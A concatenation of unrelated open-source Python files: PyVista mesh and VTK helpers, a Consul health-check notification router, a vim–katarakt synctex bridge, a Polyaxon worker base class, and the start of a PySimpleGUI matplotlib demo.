preference = parse_field_choice(preference)
if np.sum([parr is not None, carr is not None, farr is not None]) > 1:
if preference == FieldAssociation.CELL:
if info:
return carr, FieldAssociation.CELL
else:
return carr
elif preference == FieldAssociation.POINT:
if info:
return parr, FieldAssociation.POINT
else:
return parr
elif preference == FieldAssociation.NONE:
if info:
return farr, FieldAssociation.NONE
else:
return farr
else:
raise ValueError(f'Data field ({preference}) not supported.')
arr = None
field = None
if parr is not None:
arr = parr
field = FieldAssociation.POINT
elif carr is not None:
arr = carr
field = FieldAssociation.CELL
elif farr is not None:
arr = farr
field = FieldAssociation.NONE
elif err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
if info:
return arr, field
return arr
def vtk_points(points, deep=True):
"""Convert numpy points to a vtkPoints object."""
if not points.flags['C_CONTIGUOUS']:
points = np.ascontiguousarray(points)
vtkpts = vtk.vtkPoints()
vtkpts.SetData(nps.numpy_to_vtk(points, deep=deep))
return vtkpts
def line_segments_from_points(points):
"""Generate non-connected line segments from points.
Assumes points are ordered as line segments and an even number of points
are
Parameters
----------
points : np.ndarray
Points representing line segments. An even number must be given as
every two vertices represent a single line segment. For example, two
line segments would be represented as:
np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
Returns
-------
lines : pyvista.PolyData
PolyData with lines and cells.
Examples
--------
This example plots two line segments at right angles to each other line.
>>> import pyvista
>>> import numpy as np
>>> points = np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
>>> lines = pyvista.lines_from_points(points)
>>> lines.plot() # doctest:+SKIP
"""
if len(points) % 2 != 0:
raise ValueError("An even number of points must be given to define each segment.")
# Assuming ordered points, create array defining line order
n_points = len(points)
n_lines = n_points // 2
lines = np.c_[(2 * np.ones(n_lines, np.int_),
np.arange(0, n_points-1, step=2),
np.arange(1, n_points+1, step=2))]
poly = pyvista.PolyData()
poly.points = points
poly.lines = lines
return poly
def lines_from_points(points, close=False):
"""Make a connected line set given an array of points.
Parameters
----------
points : np.ndarray
Points representing the vertices of the connected segments. For
example, two line segments would be represented as:
np.array([[0, 0, 0], [1, 0, 0], [1, 1, 0]])
close : bool, optional
If True, close the line segments into a loop
Returns
-------
lines : pyvista.PolyData
PolyData with lines and cells.
"""
poly = pyvista.PolyData()
poly.points = points
cells = np.full((len(points)-1, 3), 2, dtype=np.int_)
cells[:, 1] = np.arange(0, len(points)-1, dtype=np.int_)
cells[:, 2] = np.arange(1, len(points), dtype=np.int_)
if close:
cells = np.append(cells, [[2, len(points)-1, 0],], axis=0)
poly.lines = cells
return poly
def make_tri_mesh(points, faces):
"""Construct a ``pyvista.PolyData`` mesh using points and faces arrays.
Construct a mesh from an Nx3 array of points and an Mx3 array of
triangle indices, resulting in a mesh with N vertices and M
triangles. This function does not require the standard VTK
"padding" column and simplifies mesh creation.
Parameters
----------
points : np.ndarray
Array of points with shape (N, 3) storing the vertices of the
triangle mesh.
faces : np.ndarray
Array of indices with shape (M, 3) containing the triangle
indices.
Returns
-------
tri_mesh : pyvista.PolyData
PolyData instance containing the triangle mesh.
Examples
--------
This example discretizes the unit square into a triangle mesh with
nine vertices and eight faces.
>>> import numpy as np
>>> import pyvista as pv
>>> points = np.array([[0, 0, 0], [0.5, 0, 0], [1, 0, 0], [0, 0.5, 0],
... [0.5, 0.5, 0], [1, 0.5, 0], [0, 1, 0], [0.5, 1, 0],
... [1, 1, 0]])
>>> faces = np.array([[0, 1, 4], [4, 7, 6], [2, 5, 4], [4, 5, 8],
... [0, 4, 3], [3, 4, 6], [1, 2, 4], [4, 8, 7]])
>>> tri_mesh = pyvista.make_tri_mesh(points, faces)
>>> tri_mesh.plot(show_edges=True) # doctest:+SKIP
"""
if points.shape[1] != 3:
raise ValueError("Points array should have shape (N, 3).")
if faces.ndim != 2 or faces.shape[1] != 3:
raise ValueError("Face array should have shape (M, 3).")
cells = np.empty((faces.shape[0], 4), dtype=faces.dtype)
cells[:, 0] = 3
cells[:, 1:] = faces
return pyvista.PolyData(points, cells)
def vector_poly_data(orig, vec):
"""Create a vtkPolyData object composed of vectors."""
# shape, dimension checking
if not isinstance(orig, np.ndarray):
orig = np.asarray(orig)
if not isinstance(vec, np.ndarray):
vec = np.asarray(vec)
if orig.ndim != 2:
orig = orig.reshape((-1, 3))
elif orig.shape[1] != 3:
raise ValueError('orig array must be 3D')
if vec.ndim != 2:
vec = vec.reshape((-1, 3))
elif vec.shape[1] != 3:
raise ValueError('vec array must be 3D')
# Create vtk points and cells objects
vpts = vtk.vtkPoints()
vpts.SetData(nps.numpy_to_vtk(np.ascontiguousarray(orig), deep=True))
npts = orig.shape[0]
cells = np.empty((npts, 2), dtype=pyvista.ID_TYPE)
cells[:, 0] = 1
cells[:, 1] = np.arange(npts, dtype=pyvista.ID_TYPE)
vcells = pyvista.utilities.cells.CellArray(cells, npts)
# Create vtkPolyData object
pdata = vtk.vtkPolyData()
pdata.SetPoints(vpts)
pdata.SetVerts(vcells)
# Add vectors to polydata
name = 'vectors'
vtkfloat = nps.numpy_to_vtk(np.ascontiguousarray(vec), deep=True)
vtkfloat.SetName(name)
pdata.GetPointData().AddArray(vtkfloat)
pdata.GetPointData().SetActiveVectors(name)
# Add magnitude of vectors to polydata
name = 'mag'
scalars = (vec * vec).sum(1)**0.5
vtkfloat = nps.numpy_to_vtk(np.ascontiguousarray(scalars), deep=True)
vtkfloat.SetName(name)
pdata.GetPointData().AddArray(vtkfloat)
pdata.GetPointData().SetActiveScalars(name)
return pyvista.PolyData(pdata)
def trans_from_matrix(matrix): # pragma: no cover
"""Convert a vtk matrix to a numpy.ndarray.
DEPRECATED: Please use ``array_from_vtkmatrix``.
"""
# import needs to happen here to prevent a circular import
from pyvista.core.errors import DeprecationError
raise DeprecationError('DEPRECATED: Please use ``array_from_vtkmatrix``.')
def array_from_vtkmatrix(matrix):
"""Convert a vtk matrix to a ``numpy.ndarray``.
Parameters
----------
matrix : vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4
The vtk matrix to be converted to a ``numpy.ndarray``.
Returned ndarray has shape (3, 3) or (4, 4) as appropriate.
"""
if isinstance(matrix, vtk.vtkMatrix3x3):
shape = (3, 3)
elif isinstance(matrix, vtk.vtkMatrix4x4):
shape = (4, 4)
else:
raise TypeError('Expected vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4 input,'
f' got {type(matrix).__name__} instead.')
array = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
array[i, j] = matrix.GetElement(i, j)
return array
def vtkmatrix_from_array(array):
"""Convert a ``numpy.ndarray`` or array-like to a vtk matrix.
Parameters
----------
array : numpy.ndarray or array-like
The array or array-like to be converted to a vtk matrix.
Shape (3, 3) gets converted to a ``vtk.vtkMatrix3x3``, shape (4, 4)
gets converted to a ``vtk.vtkMatrix4x4``. No other shapes are valid.
"""
array = np.asarray(array)
if array.shape == (3, 3):
matrix = vtk.vtkMatrix3x3()
elif array.shape == (4, 4):
matrix = vtk.vtkMatrix4x4()
else:
raise ValueError(f'Invalid shape {array.shape}, must be (3, 3) or (4, 4).')
m, n = array.shape
for i in range(m):
for j in range(n):
matrix.SetElement(i, j, array[i, j])
return matrix
def is_meshio_mesh(mesh):
"""Test if passed object is instance of ``meshio.Mesh``."""
try:
import meshio
return isinstance(mesh, meshio.Mesh)
except ImportError:
return False
def wrap(dataset):
"""Wrap any given VTK data object to its appropriate PyVista data object.
Other formats that are supported include:
* 2D :class:`numpy.ndarray` of XYZ vertices
* 3D :class:`numpy.ndarray` representing a volume. Values will be scalars.
* 3D :class:`trimesh.Trimesh` mesh.
Parameters
----------
dataset : :class:`numpy.ndarray`, :class:`trimesh.Trimesh`, or VTK object
Dataset to wrap.
Returns
-------
wrapped_dataset : pyvista class
The `pyvista` wrapped dataset.
Examples
--------
Wrap a numpy array representing a random point cloud
>>> import numpy as np
>>> import pyvista
>>> points = np.random.random((10, 3))
>>> cloud = pyvista.wrap(points)
>>> cloud # doctest:+SKIP
PolyData (0x7fc52db83d70)
N Cells: 10
N Points: 10
X Bounds: 1.123e-01, 7.457e-01
Y Bounds: 1.009e-01, 9.877e-01
Z Bounds: 2.346e-03, 9.640e-01
N Arrays: 0
Wrap a Trimesh object
>>> import trimesh
>>> import pyvista
>>> points = [[0, 0, 0], [0, 0, 1], [0, 1, 0]]
>>> faces = [[0, 1, 2]]
>>> tmesh = trimesh.Trimesh(points, faces=faces, process=False)
>>> mesh = pyvista.wrap(tmesh)
>>> mesh # doctest:+SKIP
PolyData (0x7fc55ff27ad0)
N Cells: 1
N Points: 3
X Bounds: 0.000e+00, 0.000e+00
Y Bounds: 0.000e+00, 1.000e+00
Z Bounds: 0.000e+00, 1.000e+00
N Arrays: 0
Wrap a VTK object
>>> import pyvista
>>> import vtk
>>> points = vtk.vtkPoints()
>>> p = [1.0, 2.0, 3.0]
>>> vertices = vtk.vtkCellArray()
>>> pid = points.InsertNextPoint(p)
>>> _ = vertices.InsertNextCell(1)
>>> _ = vertices.InsertCellPoint(pid)
>>> point = vtk.vtkPolyData()
>>> _ = point.SetPoints(points)
>>> _ = point.SetVerts(vertices)
>>> mesh = pyvista.wrap(point)
>>> mesh # doctest:+SKIP
PolyData (0x7fc55ff27ad0)
N Cells: 1
N Points: 3
X Bounds: 0.000e+00, 0.000e+00
Y Bounds: 0.000e+00, 1.000e+00
Z Bounds: 0.000e+00, 1.000e+00
N Arrays: 0
"""
wrappers = {
'vtkUnstructuredGrid': pyvista.UnstructuredGrid,
'vtkRectilinearGrid': pyvista.RectilinearGrid,
'vtkStructuredGrid': pyvista.StructuredGrid,
'vtkPolyData': pyvista.PolyData,
'vtkImageData': pyvista.UniformGrid,
'vtkStructuredPoints': pyvista.UniformGrid,
'vtkMultiBlockDataSet': pyvista.MultiBlock,
'vtkTable': pyvista.Table,
# 'vtkParametricSpline': pyvista.Spline,
}
# Otherwise, we assume a VTK data object was passed
if hasattr(dataset, 'GetClassName'):
key = dataset.GetClassName()
elif dataset is None:
return None
elif isinstance(dataset, np.ndarray):
if dataset.ndim == 1 and dataset.shape[0] == 3:
return pyvista.PolyData(dataset)
if dataset.ndim > 1 and dataset.ndim < 3 and dataset.shape[1] == 3:
return pyvista.PolyData(dataset)
elif dataset.ndim == 3:
mesh = pyvista.UniformGrid(dataset.shape)
mesh['values'] = dataset.ravel(order='F')
mesh.active_scalars_name = 'values'
return mesh
else:
print(dataset.shape, dataset)
raise NotImplementedError('NumPy array could not be converted to PyVista.')
elif is_meshio_mesh(dataset):
return from_meshio(dataset)
elif dataset.__class__.__name__ == 'Trimesh':
# trimesh doesn't pad faces
n_face = dataset.faces.shape[0]
faces = np.empty((n_face, 4), dataset.faces.dtype)
faces[:, 1:] = dataset.faces
faces[:, 0] = 3
return pyvista.PolyData(np.asarray(dataset.vertices), faces)
else:
raise NotImplementedError(f'Type ({type(dataset)}) not able to be wrapped into a PyVista mesh.')
try:
wrapped = wrappers[key](dataset)
except KeyError:
logging.warning(f'VTK data type ({key}) is not currently supported by pyvista.')
return dataset # if not supported just passes the VTK data object
return wrapped
def image_to_texture(image):
"""Convert ``vtkImageData`` (:class:`pyvista.UniformGrid`) to a ``vtkTexture``."""
return pyvista.Texture(image)
def numpy_to_texture(image):
"""Convert a NumPy image array to a vtk.vtkTexture."""
return pyvista.Texture(image)
def is_inside_bounds(point, bounds):
"""Check if a point is inside a set of bounds.
This is implemented through recursion so that this is N-dimensional.
"""
if isinstance(point, (int, float)):
point = [point]
if isinstance(point, (np.ndarray, collections.abc.Sequence)) and not isinstance(point, collections.deque):
if len(bounds) < 2 * len(point) or len(bounds) % 2 != 0:
raise ValueError('Bounds mismatch point dimensionality')
point = collections.deque(point)
bounds = collections.deque(bounds)
return is_inside_bounds(point, bounds)
if not isinstance(point, collections.deque):
raise TypeError(f'Unknown input data type ({type(point)}).')
if len(point) < 1:
return True
p = point.popleft()
lower, upper = bounds.popleft(), bounds.popleft()
if lower <= p <= upper:
return is_inside_bounds(point, bounds)
return False
def fit_plane_to_points(points, return_meta=False):
"""Fit a plane to a set of points.
Parameters
----------
points : np.ndarray
Size n by 3 array of points to fit a plane through
return_meta : bool
If true, also returns the center and normal used to generate the plane
"""
data = np.array(points)
center = data.mean(axis=0)
result = np.linalg.svd(data - center)
normal = np.cross(result[2][0], result[2][1])
plane = pyvista.Plane(center=center, direction=normal)
if return_meta:
return plane, center, normal
return plane
def raise_not_matching(scalars, mesh):
"""Raise exception about inconsistencies."""
if isinstance(mesh, vtk.vtkTable):
raise ValueError(f'Number of scalars ({scalars.size}) must match number of rows ({mesh.n_rows}).')
raise ValueError(f'Number of scalars ({scalars.size}) ' +
f'must match either the number of points ({mesh.n_points}) ' +
f'or the number of cells ({mesh.n_cells}).')
def generate_plane(normal, origin):
"""Return a vtk.vtkPlane."""
plane = vtk.vtkPlane()
# NORMAL MUST HAVE MAGNITUDE OF 1
normal = normal / np.linalg.norm(normal)
plane.SetNormal(normal)
plane.SetOrigin(origin)
return plane
def try_callback(func, *args):
"""Wrap a given callback in a try statement."""
try:
func(*args)
except Exception:
etype, exc, tb = sys.exc_info()
stack = traceback.extract_tb(tb)[1:]
formatted_exception = \
'Encountered issue in callback (most recent call last):\n' + \
''.join(traceback.format_list(stack) +
traceback.format_exception_only(etype, exc)).rstrip('\n')
logging.warning(formatted_exception)
return
def check_depth_peeling(number_of_peels=100, occlusion_ratio=0.0):
"""Check if depth peeling is available.
Attempts to use depth peeling to see if it is available for the current
environment. Returns ``True`` if depth peeling is available and has been
successfully leveraged, otherwise ``False``.
"""
# Try Depth Peeling with a basic scene
source = vtk.vtkSphereSource()
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(source.GetOutputPort())
actor = vtk.vtkActor()
actor.SetMapper(mapper)
# requires opacity < 1
actor.GetProperty().SetOpacity(0.5)
renderer = vtk.vtkRenderer()
renderWindow = vtk.vtkRenderWindow()
renderWindow.AddRenderer(renderer)
renderWindow.SetOffScreenRendering(True)
renderWindow.SetAlphaBitPlanes(True)
renderWindow.SetMultiSamples(0)
renderer.AddActor(actor)
renderer.SetUseDepthPeeling(True)
renderer.SetMaximumNumberOfPeels(number_of_peels)
renderer.SetOcclusionRatio(occlusion_ratio)
renderWindow.Render()
return renderer.GetLastRenderingUsedDepthPeeling() == 1
def threaded(fn):
"""Call a function using a thread."""
def wrapper(*args, **kwargs):
thread = Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
class conditional_decorator:
"""Conditional decorator for methods."""
def __init__(self, dec, condition):
"""Initialize."""
self.decorator = dec
self.condition = condition
def __call__(self, func):
"""Call the decorated function if condition is matched."""
if not self.condition:
# Return the function unchanged, not decorated.
return func
return self.decorator(func)
class ProgressMonitor():
"""A standard class for monitoring the progress of a VTK algorithm.
This must be use in a ``with`` context and it will block keyboard
interrupts from happening until the exit event as interrupts will crash
the kernel if the VTK algorithm is still executing.
"""
def __init__(self, algorithm, message="", scaling=100):
"""Initialize observer."""
try:
from tqdm import tqdm
except ImportError:
raise ImportError("Please install `tqdm` to monitor algorithms.")
self.event_type = vtk.vtkCommand.ProgressEvent
self.progress = 0.0
self._last_progress = self.progress
self.algorithm = algorithm
self.message = message
self._interrupt_signal_received = False
self._old_progress = 0
self._old_handler = None
self._progress_bar = None
def handler(self, sig, frame):
"""Pass signal to custom interrupt handler."""
self._interrupt_signal_received = (sig, frame)
logging.debug('SIGINT received. Delaying KeyboardInterrupt until '
'VTK algorithm finishes.')
def __call__(self, obj, event, *args):
"""Call progress update callback.
On an event occurrence, this function executes.
"""
if self._interrupt_signal_received:
obj.AbortExecuteOn()
else:
progress = obj.GetProgress()
step = progress - self._old_progress
self._progress_bar.update(step)
self._old_progress = progress
def __enter__(self):
"""Enter event for ``with`` context."""
from tqdm import tqdm
# check if in main thread
if threading.current_thread().__class__.__name__ == '_MainThread':
self._old_handler = signal.signal(signal.SIGINT, self.handler)
self._progress_bar = tqdm(total=1, leave=True,
bar_format='{l_bar}{bar}[{elapsed}<{remaining}]')
self._progress_bar.set_description(self.message)
self.algorithm.AddObserver(self.event_type, self)
return self._progress_bar
def __exit__(self, type, value, traceback):
"""Exit event for ``with`` context."""
self._progress_bar.total = 1
self._progress_bar.refresh()
self._progress_bar.close()
self.algorithm.RemoveObservers(self.event_type)
if threading.current_thread().__class__.__name__ == '_MainThread':
signal.signal(signal.SIGINT, self._old_handler)
def abstract_class(cls_):
"""Decorate a class, overriding __new__.
Preventing a class from being instantiated similar to abc.ABCMeta
but does not require an abstract method.
"""
def __new__(cls, *args, **kwargs):
if cls is cls_:
raise TypeError(f'{cls.__name__} is an abstract class and may not be instantiated.')
return object.__new__(cls)
cls_.__new__ = __new__
return cls_
def axis_rotation(points, angle, inplace=False, deg=True, axis='z'):
"""Rotate points angle (in deg) about an axis.
Parameters
----------
points : numpy.ndarray
Array of points with shape ``(N, 3)``
angle : float
Rotation angle.
inplace : bool, optional
Updates points in-place while returning nothing.
deg : bool, optional
If `True`, the angle is interpreted as degrees instead of
radians. Default is `True`.
axis : str, optional
Name of axis to rotate about. Valid options are ``'x'``, ``'y'``,
and ``'z'``. Default value is ``'z'``.
Returns
-------
points : numpy.ndarray
Rotated points.
Examples
--------
Rotate a set of points by 90 degrees about the x-axis in-place.
>>> import numpy as np
>>> import pyvista
>>> from pyvista import examples
>>> points = examples.load_airplane().points
>>> points_orig = points.copy()
>>> pyvista.axis_rotation(points, 90, axis='x', deg=True, inplace=True)
>>> assert np.all(np.isclose(points[:, 0], points_orig[:, 0]))
>>> assert np.all(np.isclose(points[:, 1], -points_orig[:, 2]))
>>> assert np.all(np.isclose(points[:, 2], points_orig[:, 1]))
"""
axis = axis.lower()
axis_to_vec = {
'x': (1, 0, 0),
'y': (0, 1, 0),
'z': (0, 0, 1)
}
if axis not in axis_to_vec:
raise ValueError('Invalid axis. Must be either "x", "y", or "z"')
rot_mat = transformations.axis_angle_rotation(axis_to_vec[axis], angle, deg=deg)
return transformations.apply_transformation_to_points(rot_mat, points, inplace=inplace)
|
NotificationEngine.py
|
import requests
import consulate
import json as json
import smtplib
import string
import sys
import settings
import plugins
import utilities
from multiprocessing import Process
class NotificationEngine(object):
"""
NotificationEngine, routes given ConsulHealthNodeStruct objects
using the plugins available and based off tags in ConsulHealthNodeStruct.
ConsulHealthNodeStruct is an python object representation of
{
"Node": "foobar",
"CheckID": "service:redis",
"Name": "Service 'redis' check",
"Status": "passing",
"Tags": [],
"Notes": "",
"Output": "",
"ServiceID": "redis",
"ServiceName": "redis"
}
Example use:
NotificationEngine([ConsulHealthNodeStruct,ConsulHealthNodeStruct]).Run()
"""
def __init__(self, alert_list, consulate_session):
"""consul_watch_handler_checks, will send a list of ConsulHealthNodeStruct
Arguments:
alert_list: List of ConsulHealthNodeStruct Object
consulate_session: Consulate object
"""
self.alert_list = alert_list
self.consul = consulate_session
def __getattr__(self, item):
return None
def get_available_plugins(self):
try:
self.available_plugins = set(
json.loads(self.consul.kv[settings.KV_ALERTING_AVAILABLE_PLUGINS]))
settings.logger.info(
"Plugins available, Plugins={plug}".format(
plug=list(self.available_plugins)))
return self.available_plugins
except TypeError:
settings.logger.error(
"Could not obtain alerting"
"plugins from ConsulURI=%{location}".format(
location=settings.KV_ALERTING_AVAILABLE_PLUGINS))
raise
def get_unique_tags_keys(self):
"""
find unique tags in the list of ConsulHealthNodeStruct objects, used to determine which plugins to load
"""
# python 2.6 syntax
self.unique_tags = set(
tag for obj in self.alert_list for tag in obj.Tags)
settings.logger.info("Unique tags found,"
"Tags={tags}".format(tags=list(self.unique_tags)))
return self.unique_tags
def load_plugins_from_tags(self):
# set intersection of unique_tags and available_plugins
configurations_files_to_load = self.unique_tags.intersection(
self.available_plugins)
settings.logger.info(
"Configuration files to load,"
"Configurations={configs}".format(configs=list(configurations_files_to_load)))
if "hipchat" in configurations_files_to_load:
self.hipchat = utilities.load_plugin(
settings.KV_ALERTING_NOTIFY_HIPCHAT, "rooms")
if "slack" in configurations_files_to_load:
self.slack = utilities.load_plugin(
settings.KV_ALERTING_NOTIFY_SLACK, "rooms")
if "mailgun" in configurations_files_to_load:
self.mailgun = utilities.load_plugin(
settings.KV_ALERTING_NOTIFY_MAILGUN, "teams")
if "email" in configurations_files_to_load:
self.email = utilities.load_plugin(
settings.KV_ALERTING_NOTIFY_EMAIL, "teams")
if "pagerduty" in configurations_files_to_load:
self.pagerduty = utilities.load_plugin(
settings.KV_ALERTING_NOTIFY_PAGERDUTY, "teams")
if "influxdb" in configurations_files_to_load:
self.influxdb = utilities.load_plugin(
settings.KV_ALERTING_NOTIFY_INFLUXDB, "databases")
if "cachet" in configurations_files_to_load:
self.cachet = utilities.load_plugin(
settings.KV_ALERTING_NOTIFY_CACHET)
if "elasticsearchlog" in configurations_files_to_load:
self.elasticsearchlog = utilities.load_plugin(
settings.KV_ALERTING_NOTIFY_ELASTICSEARCHLOG)
return (self.hipchat, self.slack, self.mailgun,
self.email, self.pagerduty, self.influxdb, self.elasticsearchlog)
def message_pattern(self, obj):
if obj.ServiceName or obj.ServiceID:
message_template = "Service {name}: "\
"is in a {state} state on {node}. "\
"Output from check: {output}".format(name=obj.ServiceName,
state=obj.Status,
node=obj.Node,
output=obj.Output)
else:
message_template = "System Check {name}: is "\
"in a {state} state on {node}. "\
"Output from check: {output}".format(name=obj.CheckID,
state=obj.Status,
node=obj.Node,
output=obj.Output)
return message_template
def run_notifiers(self, obj):
message_template = self.message_pattern(obj)
if "hipchat" in obj.Tags and self.hipchat:
common_notifiers = utilities.common_notifiers(
obj, "rooms", self.hipchat)
hipchat = self.hipchat
_ = Process(target=plugins.notify_hipchat, args=(obj, message_template,
common_notifiers,
hipchat)).start()
if "slack" in obj.Tags and self.slack:
common_notifiers = utilities.common_notifiers(
obj, "rooms", self.slack)
slack = self.slack
_ = Process(target=plugins.notify_slack, args=(message_template,
common_notifiers,
slack)).start()
if "mailgun" in obj.Tags and self.mailgun:
common_notifiers = utilities.common_notifiers(
obj, "teams", self.mailgun)
mailgun = self.mailgun
_ = Process(target=plugins.notify_mailgun, args=(message_template,
common_notifiers,
mailgun)).start()
if "email" in obj.Tags and self.email:
common_notifiers = utilities.common_notifiers(
obj, "teams", self.email)
email = self.email
_ = Process(target=plugins.notify_email, args=(message_template,
common_notifiers,
email)).start()
if "pagerduty" in obj.Tags and self.pagerduty:
common_notifiers = utilities.common_notifiers(
obj, "teams", self.pagerduty)
pagerduty = self.pagerduty
_ = Process(target=plugins.notify_pagerduty, args=(obj,
message_template,
common_notifiers,
pagerduty)).start()
if "influxdb" in obj.Tags and self.influxdb:
common_notifiers = utilities.common_notifiers(
obj, "databases", self.influxdb)
influxdb = self.influxdb
_ = Process(target=plugins.notify_influxdb, args=(obj, message_template,
common_notifiers,
influxdb)).start()
if "cachet" in obj.Tags and self.cachet:
_ = Process(target=plugins.notify_cache, args=(obj, message_template, self.cachet)).start()
if "elasticsearchlog" in obj.Tags and self.elasticsearchlog:
_ = Process(target=plugins.notify_elasticsearchlog, args=(obj, message_template,
self.elasticsearchlog)).start()
def Run(self):
self.get_available_plugins()
self.get_unique_tags_keys()
self.load_plugins_from_tags()
for obj in self.alert_list:
self.run_notifiers(obj)
|
synctex-katarakt-vim.py
|
#!/usr/bin/env python3
# Dependencies (Debian/Ubuntu package names):
#
# python3-gi
# python3-dbus
#
# Thorsten Wißmann, 2015
# in case of bugs, contact: edu _at_ thorsten-wissmann _dot_ de
def print_help():
print("""Usage: {0} SESSIONNAME [PDFFILE]
A katarakt wrapper for synctex communication between vim and katarakt.
SESSIONNAME is the name of your vim session, i.e. you have to start a vim
session *yourself* and *beforehand* with
vim --servername SESSIONNAME
Behaviour:
This script starts katarakt for PDFFILE. If no PDFFILE is specified, it tries
to autodetect the correct pdf file (by finding a corresponding .synctex.gz
file in the current directory).
It registers a keybinding in vim (per default "ZE"), to jump to the
corresponding page in katarakt. The vim keybinding can be overwritten by the
VIM_KEY environment variable.
If Katarakt emits the edit signal (usually on Ctrl+LeftMouse), then it
opens the corresponding tex file in vim and jumps to the corresponding
line in the texfile.
If the user presses ZE in the editor, a message is sent to this script.
This script calls synctex and sends the pdf-coordinates to katarakt.
When katarakt quits, then this script exits as well.
Requirements:
You need to compile the latex document using the option -synctex=1 in order to
obtain the required .synctex.gz file.
Hint: VIM configuration:
Add the following line to your vimrc:
au BufRead *.tex execute "nmap ZE :! synctex-katarakt-vim " . v:servername . " 2>/dev/null >/dev/null &<LEFT><LEFT>"
When typing ZE the first time, it automatically calls this script, overwrites
the ZE keybinding, and opens a katarakt instance. After typing ZE the first
time, you are prompted such that you can specify an alternate PDF file. If
you want an alternate vim keybinding (e.g. <Leader>f), add this line:
au BufRead *.tex execute "nmap ZF :! VIM_KEY='ZF' synctex-katarakt-vim " . v:servername . " 2>/dev/null >/dev/null &<LEFT><LEFT>"
If your key contains something like <Leader> (or other keys containing "<"),
escape it properly in the VIM_KEY= assignment.
""".format(sys.argv[0]))
from gi.repository import GLib
import sys
import dbus
import dbus.service
import subprocess
import time # only for sleep()
import threading
import os
import re # for regular expressions
from dbus.mainloop.glib import DBusGMainLoop
# tell dbus that we use the gobject main loop
DBusGMainLoop(set_as_default=True)
loop = GLib.MainLoop()
#########################################
# Settings #
#########################################
def detect_synctexfile():
# try to find the synctex.gz file in the current directory
a = re.compile(".*\.synctex\.gz$")
files = [f for f in os.listdir('.') if os.path.isfile(f) and a.match(f)]
return files
def die(msg):
print(msg)
exit(1)
try:
session_name = sys.argv[1]
except IndexError:
print_help()
exit(0)
if session_name == "-h" or session_name == "--help":
print_help()
exit(0)
try:
pdf_filename = sys.argv[2]
except IndexError:
try:
synctex_filename = detect_synctexfile()[0]
pdf_filename = re.sub("\.synctex\.gz$", ".pdf", synctex_filename)
print("auto-detected {0}".format(pdf_filename))
except IndexError:
die("no *.synctex.gz file found in current directory")
vim_session = session_name
vim_view_keybind = os.getenv('VIM_KEY', 'ZE')
pdfprocess = subprocess.Popen(['katarakt', '--single-instance', 'false', pdf_filename])
pdf_pid = pdfprocess.pid
view_command = ("qdbus katarakt.pid%d" % pdf_pid +
" / katarakt.SourceCorrelate.view" +
" %{output} %{page} %{x} %{y}")
# connect to dbus
bus = dbus.SessionBus()
# wait for katarakt to show up
# it doesn't seem to be trivial to wait for an
# application to show up at dbus. hence the (still racy) hack
katarakt_booted = False
while pdfprocess.pid != None and not katarakt_booted:
try:
katarakt = bus.get_object('katarakt.pid%d' % pdf_pid, '/')
iface = dbus.Interface(katarakt, 'katarakt.SourceCorrelate')
katarakt_booted = True
except dbus.exceptions.DBusException:
time.sleep(0.01)
# register an own service on the session bus
busName = dbus.service.BusName('katarakt.synctex.vim.' + session_name,
bus = dbus.SessionBus())
class BridgeObject(dbus.service.Object):
def __init__(self, object_path):
dbus.service.Object.__init__(self, busName,
object_path)
@dbus.service.method(dbus_interface='katarakt.bridge',
in_signature='sii', out_signature='')
def View(self, filename, line, col):
subprocess.call([
"synctex", "view",
"-i", "%d:%d:%s" % (line,col,filename),
"-o", pdf_filename,
"-x", view_command,
])
# create the dbus object and bind it to the bus
BridgeObject('/')
# inject the keybinding for viewing into the vim session
returncode = subprocess.call([
"vim", "--servername", vim_session,
"--remote-send",
("<ESC>:map %s" % vim_view_keybind
+ " :exec \"execute ('!qdbus katarakt.synctex.vim.%s" % session_name
+ " / katarakt.bridge.View % ' . line('.') . ' 0')\"<lt>CR><lt>CR><CR><CR>")
])
if returncode != 0:
print("Error when trying to register keybinding in the vim session \"{0}\"".format(vim_session))
exit(1)
# callback if the signal for edit is sent by katarakt
def on_edit(filename,page,x,y):
#print ("go to page %d at %d,%d" % (page,x,y))
subprocess.call([
"synctex", "edit",
"-o", ("%d:%d:%d:%s" % (1+page,x,y,filename)),
"-x", "vim --servername '" + vim_session + "' --remote-silent '+%{line}' %{input}",
])
iface.connect_to_signal("edit", on_edit)
# Main loop and cleanup:
def quit_if_pdf_exits():
pdfprocess.wait()
loop.quit()
thread = threading.Thread(target=quit_if_pdf_exits, args=())
thread.start()
loop.run()
|
base_worker.py
|
#!/usr/bin/python
#
# Copyright 2018-2022 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import atexit
import os
import threading
class BaseWorker:
NAME = None
def __init__(self):
assert self.NAME, "Worker class `{}` must have a valid name.".format(
self.__class__.__name__
)
self._lock = threading.Lock()
self._thread = None
self._thread_for_pid = None
def is_alive(self):
if self._thread_for_pid != os.getpid():
return False
return bool(self._thread and self._thread.is_alive())
def is_running(self):
if self.is_alive():
return
self.start()
def start(self):
self._lock.acquire()
try:
if not self.is_alive():
self._thread = threading.Thread(target=self._target, name=self.NAME)
self._thread.setDaemon(True)
self._thread.start()
self._thread_for_pid = os.getpid()
finally:
self._lock.release()
atexit.register(self.atexit)
def atexit(self):
raise NotImplementedError("Worker must implement `atexit` function.")
def _target(self):
raise NotImplementedError("Worker must implement `target` function.")
|
Demo_Matplotlib_Animated_FuncAnimation.py
|
import PySimpleGUI as sg
import matplotlib.pyplot as plt
from matplotlib import style
import matplotlib.animation as animation
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from random import randint
import time
import threading
# Usage of MatPlotLib with matplotlib.animation for better performance
def main():
sg.theme('DarkBlue14')
layout = [[sg.Text('Live Plot Matplotlib - FuncAnimation')],
[sg.Canvas(k="-CANVAS-")],
